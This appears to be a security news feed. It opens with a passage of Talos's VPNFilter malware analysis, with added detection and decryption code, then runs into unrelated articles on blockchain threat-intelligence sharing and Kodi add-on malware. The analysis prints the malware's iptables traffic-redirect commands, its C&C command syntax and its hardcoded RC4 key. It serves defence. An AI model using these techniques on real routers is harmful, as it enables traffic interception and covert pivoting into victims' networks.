The module performs a traceroute by first creating a TCP connection to 8.8.8.8:53 to confirm its availability (no data is sent), then ICMP echo requests are repeatedly sent to this IP with increasing TTLs.

All of the network information that is gathered is saved to a temporary file named /var/run/repsc_<time stamp>.bin. An example .bin file is as follows:

The code responsible for the SSDP, CDP and LLDP functions was present within the module but was never called in the samples analyzed, so those sections of the file will always be empty.

The nm module requires three command line arguments to operate properly, but only the first parameter is used. Like several other modules, the first parameter is a folder, and this is the location where the data is permanently saved. The final task performed by the nm module is the moving of the temporary .bin file containing the results of the scan to a folder specified as the first command line argument, ostensibly for later exfiltration by the main VPNFilter process.
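The distinctive part of the nm behaviour described above is the fixed list of 38 TCP ports it tries on every host that answers ARP and ICMP. The following is an added detection example (not Talos code): it groups constructed connection-attempt records by source and destination and reports any source that covered most of the nm port list against one host inside a short window. The flow records and addresses are constructed; only the port list comes from the analysis.

```python
"""Flag hosts whose connection attempts match the VPNFilter 'nm' port list.

Added illustration (not Talos code). The flow records are constructed; the
port list is the one the analysis reports for the nm module.
"""
from collections import defaultdict

# TCP ports the nm module tries on every host that answers ARP + ICMP.
NM_PORTS = frozenset({
    9, 21, 22, 23, 25, 37, 42, 43, 53, 69, 70, 79, 80, 88, 103, 110, 115,
    118, 123, 137, 138, 139, 143, 150, 156, 161, 190, 197, 389, 443, 445,
    515, 546, 547, 569, 3306, 8080, 8291,
})


def constructed_flows():
    """Constructed connection-attempt records: (timestamp, src, dst, dport)."""
    flows, t = [], 1000.0
    # Benign client talking to the gateway on a few ordinary services.
    for port in (53, 80, 443, 53):
        flows.append((t, "192.168.1.10", "192.168.1.1", port))
        t += 5.0
    # Compromised router sweeping two neighbours with the full nm list.
    for dst in ("192.168.1.20", "192.168.1.21"):
        for port in sorted(NM_PORTS):
            flows.append((t, "192.168.1.50", dst, port))
            t += 0.1
    return flows


def find_nm_scanners(flows, window_s=120.0, min_coverage=0.8):
    """Return {src: {dst: coverage}} for (src, dst) pairs where one source
    attempted at least min_coverage of NM_PORTS within window_s seconds.

    Coverage is measured against the nm list rather than raw port count, so a
    host that opens a handful of ordinary services is not reported.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_pair[(src, dst)].append((ts, dport))

    hits = defaultdict(dict)
    for (src, dst), attempts in by_pair.items():
        attempts.sort()
        for i, (t0, _) in enumerate(attempts):
            # Distinct ports seen in the window that starts at attempt i.
            seen = {p for ts, p in attempts[i:] if ts - t0 <= window_s}
            coverage = len(seen & NM_PORTS) / len(NM_PORTS)
            if coverage >= min_coverage:
                hits[src][dst] = round(coverage, 2)
                break
    return dict(hits)


if __name__ == "__main__":
    for src, targets in find_nm_scanners(constructed_flows()).items():
        for dst, cov in targets.items():
            print(f"{src} swept {dst}: {cov:.0%} of the nm port list")
```

On real data the records would come from NetFlow, conntrack or firewall logs; the threshold is deliberately on the fraction of the nm list rather than on port count, because a vulnerability scanner or a busy server hits many ports without matching this particular set.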

'netfilter' (denial-of-service utility)


netfilter expects three arguments to be given on the command line. The first two arguments are unused, and the third argument is a quoted string in the format "<block/unblock> <# of minutes>." '# of minutes' is how long netfilter should execute for before exiting. If 'block' was used as the first part of the third argument, netfilter adds the following rule to iptables:

Chain FORWARD (policy ACCEPT)
target     prot opt source         destination
DROP        tcp -- anywhere        anywhere       tcpflags: PSH/PSH

After adding this rule, netfilter waits 30 seconds and then deletes this rule. If there is still time remaining based on the '# of minutes' value, this process begins again. The addition and deletion loop ensures that the rule persists in the event the rule is deleted from the device.

Once the number of minutes has elapsed, the program exits. Signal handlers installed at the start of the netfilter program delete the iptables rule and then exit if the program receives either SIGINT or SIGTERM, so the device works as normal if someone manually terminates the netfilter program.

Finally, the 'unblock' argument can be used to delete the iptables rule that was previously added using the 'block' argument.

Although there are no other code paths possible, there are indications that there is or could have been something more to this module.

The first indicator is that all of the different netfilter module samples that Talos analyzed (MIPS, PPC, Tile-GX) contain the same list of 168 CIDR IP addresses and ranges which tie to the following companies/services:

31.13.64.51 - WhatsApp
169.44.36.0/25 - WhatsApp
203.205.167.0/24 - Tencent (Owner of QQ Chat)
52.0.0.0/16 - Amazon.com, Inc. (The following encrypted applications have used multiple IPs in this range: Wikr, Signal, Dust and Confide)

This indicates that the netfilter module may have been designed to deny access to specific forms of encrypted applications, possibly in an attempt to herd victim communications to a service that the actor preferred they use. Interestingly, Telegram, an extremely popular encrypted chat application, is missing from the list.

However, we were unable to find any references to these strings in the code. All versions of netfilter that we have samples for have this same IP range list but do not appear to use it. It's possible that the samples we have are incomplete.

The iptables rule that the netfilter module adds drops TCP packets with the PUSH flag set. If the module's purpose were to give attackers a way to launch denial-of-service attacks from compromised devices, one would expect a rule that blocks all packets, not just TCP packets with the PUSH flag set. A rule like this would more typically be useful as part of a man-in-the-middle attack, allowing attackers with access to the devices to intercept forwarded traffic, manipulate it, and then forward it on manually; that might also explain the list of CIDR ranges as a list of IPs to intercept. We were unable to locate any indication of this sort of functionality in the samples that were analyzed.

We have concluded that the IPs are not used. This may be due to them being left over from an older version of the netfilter module, functionality that has not yet been implemented, or there may be modifications to the statically linked iptables library made by the malware authors that we haven't found yet. The VPNFilter authors have modified open-source code before (e.g. the ndbr module), so it's not unexpected that they would change the libiptc code linked in the netfilter module.

'portforwarding' (Allows the forwarding of network traffic to attacker specified infrastructure)


The portforwarding module is designed to be executed with the following command line arguments:

./portforwarding <unused> <unused> "start <IP1> <PORT1> <IP2> <PORT2>"

Given these arguments, the portforwarding module will forward traffic from a particular port and IP combination to another port and IP by installing the following iptables rules:

iptables -t nat -I PREROUTING 1 -p tcp -m tcp -d <IP1> --dport <PORT1> -j DNAT --to-destination <IP2>:<PORT2>

iptables -t nat -I POSTROUTING 1 -p tcp -m tcp -d <IP2> --dport <PORT2> -j SNAT --to-source <device IP>

These rules cause any traffic passing through the infected device that is destined to IP1:PORT1 to be redirected to IP2:PORT2 instead. The second rule then changes the source address of the rerouted traffic to that of the infected device to ensure the responses are sent back to the infected device.

As a precaution, before installing the iptables rules, the portforwarding module first checks that IP2 is available by creating a socket connection to IP2 on PORT2. However, no data is sent before the socket is closed.

Like other modules that manipulate iptables, the portforwarding module enters a loop that adds the rules, waits a period of time, deletes the rules and then adds them again to ensure that the rules persist on the device even if they are manually deleted.
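Both the netfilter rule (FORWARD drops TCP segments with PSH set) and the portforwarding DNAT/SNAT pair leave a recognisable shape in the firewall configuration. The following is an added audit example (not Talos code) that parses `iptables-save` output and reports both patterns; the dump is constructed and uses documentation address ranges, not any VPNFilter infrastructure.

```python
"""Audit an iptables-save dump for the rule shapes the netfilter and
portforwarding modules install.

Added illustration (not Talos code). The dump below is constructed; the
addresses are documentation ranges, not VPNFilter infrastructure.
"""
import shlex

CONSTRUCTED_DUMP = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A FORWARD -p tcp -m tcp --tcp-flags PSH PSH -j DROP
COMMIT
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -d 203.0.113.10/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination 198.51.100.7:8443
-A POSTROUTING -d 198.51.100.7/32 -p tcp -m tcp --dport 8443 -j SNAT --to-source 192.168.88.1
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
"""


def parse_iptables_save(text):
    """Return [(table, chain, opts)] for every -A line; opts maps each
    option flag to the list of arguments that followed it."""
    rules, table = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("*"):
            table = line[1:]
            continue
        if not line.startswith("-A "):
            continue
        toks = shlex.split(line)
        opts, key = {}, None
        for tok in toks[2:]:
            if tok.startswith("-"):
                key = tok
                opts.setdefault(key, [])
            elif key is not None:
                opts[key].append(tok)
        rules.append((table, toks[1], opts))
    return rules


def _first(opts, flag):
    return opts.get(flag, [""])[0]


def audit(rules):
    """Return a list of human-readable findings."""
    findings = []
    dnat_by_target = {}
    for table, chain, o in rules:
        target = _first(o, "-j")
        # netfilter module: DROP forwarded TCP segments carrying PSH.
        if (table, chain, target) == ("filter", "FORWARD", "DROP") \
                and o.get("--tcp-flags", [])[:2] == ["PSH", "PSH"]:
            findings.append("netfilter-style rule: FORWARD drops TCP PSH segments")
        # portforwarding module, first half: DNAT in PREROUTING.
        if (table, chain, target) == ("nat", "PREROUTING", "DNAT"):
            orig = f"{_first(o, '-d').split('/')[0]}:{_first(o, '--dport')}"
            dnat_by_target[_first(o, "--to-destination")] = orig
    for table, chain, o in rules:
        # Second half: SNAT in POSTROUTING aimed at the DNAT destination.
        if (table, chain, _first(o, "-j")) == ("nat", "POSTROUTING", "SNAT"):
            new = f"{_first(o, '-d').split('/')[0]}:{_first(o, '--dport')}"
            if new in dnat_by_target:
                findings.append(
                    f"portforwarding-style redirect: {dnat_by_target[new]} -> {new} "
                    f"(source rewritten to {_first(o, '--to-source')})")
    return findings


if __name__ == "__main__":
    # On a live box: audit(parse_iptables_save(subprocess.check_output(["iptables-save"], text=True)))
    for finding in audit(parse_iptables_save(CONSTRUCTED_DUMP)):
        print(finding)
```

Because both modules re-insert their rules in a loop, a single snapshot is weaker evidence than a rule that reappears after an operator has deleted it; running the audit periodically and comparing consecutive dumps captures that persistence behaviour directly.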

'socks5proxy' (Enables establishment of a SOCKS5 proxy on compromised devices)


The socks5proxy module is a SOCKS5 proxy server that appears to be based on the open-source project shadowsocks. The server uses no authentication and is hardcoded to listen on TCP port 5380. Before the server is started, socks5proxy forks to connect to a C2 server specified in arguments supplied to the module. If the server does not respond within a few seconds, the fork kills its parent process (the server) and then exits. The C2 server can respond with commands to execute normally or terminate the server.

This module contains the following usage strings, though they do not line up with the arguments for the socks5proxy module, and these settings cannot be modified through command line arguments:

ssserver
    --username <username> username for auth
    --password <password> password for auth
    -p, --port <port> server port, default to 1080
    -d run in daemon
    --loglevel <level> log levels: fatal, error, warning, info, debug, trace
    -h, --help help

The actual command line arguments for the socks5proxy module are:

./socks5proxy <unused> <unused> "start <C&C IP> <C&C port>"

The socks5proxy module verifies that the argument count is greater than 1, but the process crashes with a SIGSEGV signal if two arguments are given, indicating that there may be limited or poor quality control during some phases of development for this malware toolchain.

'tcpvpn' (Enables establishment of a Reverse-TCP VPN on compromised devices)


The tcpvpn module is a Reverse-TCP VPN, designed to allow a remote attacker to access internal networks behind infected devices. It accomplishes this by beaconing to a remote server, which could be set up like a TunTap device to forward packets over the TCP connection. The connection is seen as outbound by network devices, which may help the module bypass simple firewalls or NAT issues. This module is similar in concept to penetration testing software Cobalt Strike's VPN Pivoting.

All data sent through the connection is encrypted with RC4. The key is generated from the following hardcoded bytes:

"213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E457A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347"

which are sandwiched between the port numbers of the current connection (e.g., "58586!;H*rK|_MwS+E!-!^yC=yJTh.ke:VynEz-~;:-Q;kQ^w^-~S;QEZh6^jgf_4RzsG80").

The command line syntax associated with the tcpvpn module is:

./tcpvpn <unused> <unused> "start <C&C IP> <C&C port>"
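For an analyst holding a packet capture of a tcpvpn session, the key construction above is enough to recover the tunnelled traffic. The following is an added example, not Talos code: it rebuilds the RC4 key from the two port numbers and the hardcoded core bytes quoted above, implements RC4, and decrypts a constructed frame. Which port goes in front is inferred from the "58586 ... 80" example in the text (assumed: local ephemeral port first, remote port last); the sample payload is constructed.

```python
"""Rebuild the tcpvpn RC4 session key and decrypt a captured frame.

Added illustration (not Talos code). The hex core is the hardcoded byte
string quoted in the analysis; the port order (local first, remote last) is
inferred from the "58586...80" example and is an assumption.
"""
from binascii import unhexlify

KEY_CORE = unhexlify(
    "213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E45"
    "7A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347"
)


def tcpvpn_key(local_port, remote_port):
    """Decimal local port + hardcoded core + decimal remote port, as ASCII."""
    return str(local_port).encode() + KEY_CORE + str(remote_port).encode()


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same call."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_frame(payload, local_port, remote_port):
    """Decrypt one captured TCP payload from a tcpvpn session."""
    return rc4(tcpvpn_key(local_port, remote_port), payload)


if __name__ == "__main__":
    # Constructed sample: the start of an IPv4 header as it might cross the tunnel.
    plaintext = bytes.fromhex("4500003c1c4640004006b1e6c0a80001c0a800c7")
    wire = rc4(tcpvpn_key(58586, 80), plaintext)
    print(decrypt_frame(wire, 58586, 80).hex())
```

Since the key depends only on public values (the two ports and a constant), anyone observing the connection can recover the plaintext, which is why the RC4 layer here is obfuscation rather than confidentiality; the same property makes decoding it in a capture straightforward.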

MikroTik Research


Introducing the Winbox Protocol Dissector


During our research into VPNFilter, we needed to determine how some of the devices were compromised. While examining the MikroTik series of devices, we noticed an open port (TCP 8291) and that the configuration tool "Winbox" uses that port for communication.

The traffic from these devices appeared as large blobs of binary data, so we weren't able to determine potential avenues of access using this protocol without a protocol dissector (which to our knowledge, didn't exist publicly). We decided to develop our protocol dissector for use with packet analysis tools such as Wireshark to learn more about the protocol, which would allow us to design effective rules to prevent future infections once potential attack vectors were discovered.

An example of such an attack vector is CVE-2018-14847 which allows an attacker to perform a directory traversal for unauthenticated credential recovery. The dissector proved extremely helpful when we wrote coverage for this vulnerability (Snort SID: 47684). While an update for this vulnerability has been released, we think it's essential for security professionals to be able to monitor this traffic to help identify any other potentially malicious traffic.

Privacy can still be maintained by ensuring that you either use "secure mode" to encrypt communications or download the latest Winbox client which communicates over encrypted channels only. This tool will NOT decrypt encrypted communications. The latest MikroTik CCR firmware version we tested (6.43.2), enforces the usage of this newer Winbox client though this is only enforced client-side. This means that you CAN still communicate over insecure channels using a custom-made client. Therefore, we believe this Wireshark dissector remains useful because an attacker can still deliver an exploit without having to reimplement said secure communications.

What is the "Winbox Protocol?"


The term "Winbox" comes from the Winbox client offered by MikroTik as an alternative to the web GUI.

From the official documentation, Winbox is a small utility that allows for the administration of MikroTik RouterOS using a fast and simple GUI. It is a native Win32 binary but can be run on Linux and MacOS (OSX) using Wine, an open-source compatibility layer. All Winbox interface functions are as close as possible to mirroring the console functions — that is why there are no Winbox sections in the manual. Some of the advanced and critical system configurations are not possible from Winbox, like changing the MAC address on an interface.

The term "Winbox Protocol" is not official, as far as we know. It's simply the term we chose since it matches the name of their client.

Using the dissector


Installation is simple, and since this is a Lua-based dissector, recompilation is not necessary. Simply drop the Winbox_Dissector.lua file into your /$HOME/.wireshark/plugins folder. By default, any TCP traffic to or from TCP port 8291 will be properly decoded as Winbox traffic once the dissector is installed.

While a single message from the client/server to its destination would be preferable for parsing purposes, this is not always the case and observing live communications proved that there are many ways that Winbox messages can be formatted and sent.

Below is an example of a Winbox communications capture that has the following properties:
  • Multiple messages sent in the same packet.
  • Messages containing one or more two-byte "chunks" that need to be removed before parsing.
  • Messages too long for a single packet — TCP reassembly applied.
  • Messages containing additional "nested" messages.

Here is how the capture is displayed before installing the dissector:

The communications are correctly parsed in Wireshark following installation of the Winbox protocol dissector:

Obtaining the Dissector


To improve the security community's ability to analyze these communications and to monitor for threats that may attempt to take advantage of the Winbox Protocol, Cisco Talos is releasing this dissector for public use. For additional information and to obtain the dissector, please see the GitHub repository here.

Conclusion


As a result of the capabilities we previously discovered in VPNFilter coupled with our new findings, we now confirm that VPNFilter provides attackers all of the functionality required to leverage compromised network and storage devices to further pivot into and attack systems within the network environments that are being targeted.

It also allows attackers to leverage their access to sensitive systems such as gateway and routing devices to perform activities such as network mapping and endpoint exploitation, network communications monitoring and traffic manipulation, among other serious threats. Another dangerous capability provided by VPNFilter is the ability to turn compromised devices into proxies that could be leveraged to obfuscate the source of future, unrelated attacks by making it appear as if the attacks originate from networks previously compromised by VPNFilter. The sophisticated nature of this framework further illustrates the advanced capabilities of the threat actors making use of it, as well as the need for organizations to deploy robust defensive architectures to combat threats such as VPNFilter.

With this new understanding of VPNFilter, most of our unanswered questions about the malware itself have now been answered. However, there are still significant unknowns about this threat that linger to this day:

How did the actor gain initial access to affected devices?

While we strongly assess that they utilized widely known, public vulnerabilities based on the makes/models affected by VPNFilter, we still don't have definitive proof of this.

Is the actor attempting to reconstitute their access?

Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated. The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.

Does this mean the actor has abandoned this expansive foothold into the small and home office (SOHO) network device space? Are they instead reconstituting their access by starting over, re-exploiting and dropping new unknown malware? Have they given up on having broad worldwide SOHO access in favor of a more tailored approach only going after specific key targets?

Whatever the answers may be, we know that the actor behind VPNFilter is extremely capable and driven by their mission priorities to continually maneuver to achieve their goals. In one form or another, they continue to develop and use the tools and frameworks necessary to achieve their mission objective(s).

IOCs


a43a4a218cf5755ce7a7744702bb45a34321339ab673863bf6f00ac193cf55fc
aac52856690468687bbe9e357d02835e9f5226a85eacc19c34ff681c50a6f0d8
13165d9673c240bf43630cddccdc4ab8b5672085520ee12f7596557be02d3605
b81f857cd8efab6e6e5368b1c00d93505808b0db4b773bee1843a3bc948d3f4f
809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f61a
7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e261086e0
81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d38c7
b301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e3f5
99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404cc7
76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7f0f
e009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae273566b0
7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb643
f8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd910a
4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c828
f1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef9fb8
8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee44ff
a249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe072
5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb177b
fe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b1943dd
116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e6bc9
4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee2c8
5d70e7dd5872cc0d7d0f7015c11400e891c939549c01922bff2bbe3b7d5d1ce3
5c52f115ab8a830d402fac8627d0bfdcbbfd4dcf0e6ad8154d49bb85387893aa
e75e224c909c9ead4cb50cd772f606407b09b146051bfb28015fcbe27b4a5e8d
999f14044f41adfd9fb6c97c04d7d2fd9af01724b3ab69739acf615654abfa43
b118b23a192f372616efe8c2b12977d379ac76df22493c14361587bd1cc8a804
7ba0dc46510492a7f6c9b2bcc155333898d677cd8a88fe0e1ac1ad3852f1c170
83b3dbf7f6bc5f98151b26781fa892fc1a014c62af18c95ae537848204f413b8
fce03f57b3fd3842efac3ce676687794c4decc29b612068e578134f3c4c4296a
1f26b69a353198bb047dde86d48198be8271e07f8c9d647d2f562207e1330a37
1e824654afba03678f8177e065c487a07192069711eeb4abe397010771b463b5
84227f906c7f49071d6598b9035fc785d2b144a6349d0cf7c29177c00db2dc2f
6eb09f805a68b29c9516d649019bea0bb4796e504ca379783455508a08f61087
aa5baa135b2ada5560833747260545d6a5b49558f6244c0f19443dc87c00294d
4c5e21125738c330af1bfe5cabc5f18fa14bbef53805dda2c3c31974555f7ec5
0f3746f273281472e7181f1dd1237f0c9fc26f576a883f42413c759f381006c4
acfc72b8d6611dc9cd6a3f1a4484aa0adfb404ad5faaa8b8db5747b0ff05bc22
fe9c17ac036622b2d73466f62b5d095edda2d3b60fa546a48d0bb18f8b11059f
830091904dab92467956b91555bc88fa7e6bbde514b8a90bb078c8a3bb2f39a9
5a28ad479d55275452e892b799c32803f81307079777bb1a5c4d24477206d16b
8440128350e98375b7eff67a147dfe4e85067d67f2ad20d9485f3de246505a5f
275c4e86218915c337d7e37e7caba36cb830512b17353bf9716c4ba6dceb33ed
b700207c903e8da41f33f11b69f703324ec79eb56c98b22efaeac0a10447ec44
2aa149a88539e8dd065c8885053a30d269be63d41a5db3f66c1982202761aa75
1a11240d0af108720de1a8a72ceadef102889f4d5679c1a187559d8d98143b0b
3b6be595b4183b473964345090077b1df29b0cace0077047b46174cc09c690e1
620c51f83457d0e8cb985f1aff07c6d4a33da7566297d41af681ae3e5fbd2f80
4c8da690501c0073a3c262a3079d8efac3fea9e2db9c55f3c512589e9364e85c
d92282acf3fea66b05a75aba695e98a5ea1cc1151f9e5370f712b69a816bf475
30382c1e7566d59723ff7ef785a1395711be64873dbca6d86691b1f5d86ba29f

Coverage


The following new coverage has been developed to detect additional modules used by VPNFilter.

New Snort for ndbr:

sid:1:47377:1

New Clam AV:

Unix.Trojan.Vpnfilter_htpx-6596262-0
Unix.Trojan.Vpnfilter_ndbr-6598711-0
Unix.Trojan.Vpnfilter_netfilter-6599563-0
Unix.Trojan.Vpnfilter_nm-6598714-0
Unix.Trojan.Vpnfilter_portforwarding-6599587-0
Unix.Trojan.Vpnfilter_socks5proxy-6599614-0
Unix.Trojan.Vpnfilter_tcpvpn-6606298-0

Updated Clam AV:

The following ClamAV signatures were updated to improve detection of additional Stage 1 and Stage 2 modules used by VPNFilter:

Unix.Trojan.Vpnfilter-6425812-1
Unix.Trojan.Vpnfilter-6550592-1

Banking trojan found in call recorder app on Play Store – stole over €10,000

By Waqas

Android is one of the most vulnerable mobile operating systems with hackers developing new Android malware and banking trojan every 17 seconds. Then, there is Google and questionable security measures to protect users from sophisticated and persistent malware attacks. Recently, Lukas Stefanko, an IT security researcher at ESET has discovered a nasty piece of banking trojan targeting […]

This is a post from HackRead.com Read the original post: Banking trojan found in call recorder app on Play Store – stole over €10,000

TRusted Anonymous Data Exchange (TRADE) Threat Intelligence Sharing With Blockchain

Co-authored by Yair Allouche.

Former U.S. Secretary of Defense Donald Rumsfeld once said, “See that the President, the Cabinet and staff are informed. If cut out of the information flow, their decisions may be poor, not made, or not confidently or persuasively implemented.”

As we saw with the discovery of the WireX malware, threat intelligence sharing is critical to discovering new threats. So what is inhibiting the smooth flow of the highest-value threat intelligence?

According to the Ponemon Institute, 60 percent of companies that belong to industry-specific threat sharing communities, such as the IT Information Sharing & Analysis Center (ISAC), do not share intelligence outside the organization due to fear of revealing a breach and the resulting liability from that disclosure. Inadvertently revealing a vulnerability or breach leaves companies open to reputational brand damage and the threat of legal action.

Smarter Threat Intelligence Sharing With TRADE

IBM’s security research lab in Be’er Sheva, Israel invented a new way to share threat intelligence that allows companies to control who has access to this data (without revealing the source of the information) and the quality of the anonymous information they consume (without knowing exactly which organization contributed the information).

TRusted Anonymous Data Exchange (TRADE) is an IBM Hyperledger Fabric (blockchain) network that allows members to exchange information by leveraging smart contracts to define the levels of trust and anonymity required to enable collaboration. A smart contract is used to enforce organizational requirements for attributes such as reputation and contribution levels to limit who has access to the threat intelligence information that members publish.

TRADE leverages existing threat intelligence exchange protocols — such as Trusted Automated Exchange of Intelligence Information (TAXII) and Structured Threat Information Expression (STIX) — that are integrated with operational workflows. Each time a member of the network contributes, accesses or enriches threat information, the transaction is recorded on the blockchain. This way, a full history of the information flow is immutably recorded and can be audited if necessary at a later date.

Establishing Trust Without Coverage Gaps or Delays

There are two common models for establishing trust in threat intelligence sharing communities today. The first is based on a trusted third party, and the second is point to point based on trust established through personal relationships. Both of these models have drawbacks that are addressed by TRADE. The third-party model introduces the trusted third party as a bottleneck, delaying the spread of crucial threat intelligence. Trust based on personal relationships inherently has coverage and scalability gaps. Using blockchain permits TRADE to mimic the peer-to-peer trust model, but without coverage gaps or delays.

Another Ponemon Institute study noted that the value of threat intelligence diminishes within minutes, so timely dissemination of this information is crucial to stopping attackers before they can cause widespread damage. TRADE allows threat analysts to quickly get the freshest data out to their peers, referred to as coalition members, without risk to the organization.

How TRADE Ensures Data Reliability With Karma

When threat intelligence is shared anonymously and organizations can opt in to information sharing coalitions at will, how do you avoid the “free rider” problem? What is the incentive for threat analysts to share data in a world where no one knows whether or not they are sharing? TRADE solves this problem by rewarding karma for information shared. To receive and consume threat intelligence data, organizations must spend the karma they’ve earned.

But if organizations are incented to contribute threat intelligence so they can then consume threat intelligence, what prevents them from anonymously contributing low-value data? In TRADE, each coalition member can gain or lose reputation based on the quality of the data they contribute. When a member spends karma to receive threat intelligence data that turns out to be flawed or misrepresented, he or she can rate the contribution.

Organizations can earn karma discounts for acquiring future threat intelligence by providing a rating for the information they received. If an organization’s reputation falls too low because it submitted low-quality data, they will not be able to access critical threat intelligence. This feature of TRADE ensures data reliability by isolating violators and cheaters.
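The karma and reputation rules in the three paragraphs above are easiest to follow as code. The following is an added toy model, not IBM's chaincode: the post gives the incentives but not the amounts, the rating scale or the cutoff, so those constants are assumptions, and the hash-chained transaction list stands in for the Hyperledger Fabric ledger.

```python
"""Toy model of TRADE's karma and reputation rules on a hash-chained ledger.

Added illustration, not IBM's code: the post describes the incentives but not
the real chaincode, so the amounts, the rating scale and the cutoff below are
assumptions chosen to make the mechanics visible.
"""
import hashlib
import json


class TradeLedger:
    CONTRIBUTE_REWARD = 10   # assumed karma earned per shared report
    CONSUME_COST = 5         # assumed karma spent to read a report
    RATING_REBATE = 1        # assumed discount for rating what you consumed
    MIN_REPUTATION = 0       # assumed cutoff: below this, no access

    def __init__(self):
        self.chain = []          # append-only transaction log
        self.karma = {}          # member -> balance
        self.reputation = {}     # member -> score
        self.reports = {}        # report_id -> (contributor, bundle)
        self.consumed = set()    # (member, report_id) pairs eligible to rate

    # --- ledger plumbing -------------------------------------------------
    def _append(self, **tx):
        prev = self.chain[-1]["hash"] if self.chain else "0" * 64
        body = json.dumps({"prev": prev, **tx}, sort_keys=True)
        digest = hashlib.sha256(body.encode()).hexdigest()
        self.chain.append({"prev": prev, "hash": digest, **tx})

    def verify_chain(self):
        """Recompute every hash; any edited or removed entry breaks the chain."""
        prev = "0" * 64
        for entry in self.chain:
            tx = {k: v for k, v in entry.items() if k not in ("prev", "hash")}
            body = json.dumps({"prev": prev, **tx}, sort_keys=True)
            if entry["prev"] != prev or entry["hash"] != hashlib.sha256(body.encode()).hexdigest():
                return False
            prev = entry["hash"]
        return True

    # --- smart-contract rules --------------------------------------------
    def join(self, member):
        self.karma.setdefault(member, 0)
        self.reputation.setdefault(member, 0)
        self._append(op="join", member=member)

    def contribute(self, member, report_id, bundle):
        """Sharing earns karma; the contributor is recorded only on the ledger."""
        self.reports[report_id] = (member, bundle)
        self.karma[member] += self.CONTRIBUTE_REWARD
        self._append(op="contribute", member=member, report=report_id)

    def consume(self, member, report_id):
        """Readers pay karma and must be in good standing; the contributor's
        identity is never returned, only the bundle."""
        if self.reputation[member] < self.MIN_REPUTATION:
            raise PermissionError(f"{member}: reputation too low")
        if self.karma[member] < self.CONSUME_COST:
            raise PermissionError(f"{member}: insufficient karma")
        self.karma[member] -= self.CONSUME_COST
        self.consumed.add((member, report_id))
        self._append(op="consume", member=member, report=report_id)
        return self.reports[report_id][1]

    def rate(self, member, report_id, useful):
        """Only consumers may rate; the rating moves the (anonymous)
        contributor's reputation and rebates part of the reader's cost."""
        if (member, report_id) not in self.consumed:
            raise PermissionError("rate only what you consumed")
        contributor = self.reports[report_id][0]
        self.reputation[contributor] += 1 if useful else -1
        self.karma[member] += self.RATING_REBATE
        self.consumed.discard((member, report_id))
        self._append(op="rate", member=member, report=report_id, useful=useful)
```

The free-rider problem is handled by `consume` refusing members with no karma, and the low-quality-data problem by `rate` lowering the contributor's reputation until `consume` locks them out; `verify_chain` is the audit-trail property the post attributes to the blockchain, in miniature.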

Enabling Threat Intelligence to Move Freely

Western novelist Louis L’Amour wrote, “Knowledge is like money: to be of value it must circulate, and in circulating it can increase in quantity and, hopefully, in value.” It’s our hope that TRADE will allow threat intelligence to circulate more freely, leading to an increase in high-quality information that organizations can use to protect themselves from the latest threats.

The post TRusted Anonymous Data Exchange (TRADE) Threat Intelligence Sharing With Blockchain appeared first on Security Intelligence.

Crooks leverages Kodi Media Player add-ons for malware distribution

Security experts have spotted a Monero cryptomining campaign that abused Kodi add-ons to deliver a miner targeting both Linux and Windows systems.

Crooks are abusing the Kodi Media Player to distribute malware: researchers from ESET recently spotted a cryptomining campaign that compromised about 5,000 computers.

Kodi users can add new functionality by installing add-ons that are available in the official Kodi repository and in several third-party stores.

An attacker can deliver malicious code by compromising the add-ons that are automatically updated by the Kodi media player.

According to ESET researchers, attackers can target Kodi to spread malware using three different mechanisms:

  1. They add the URL of a malicious repository to their Kodi installation so as to download some add-ons. The malicious add-on is then installed whenever they update their Kodi add-ons.
  2. They install a ready-made Kodi build that includes the URL of a malicious repository. The malicious add-on is then installed whenever they update their Kodi add-ons.
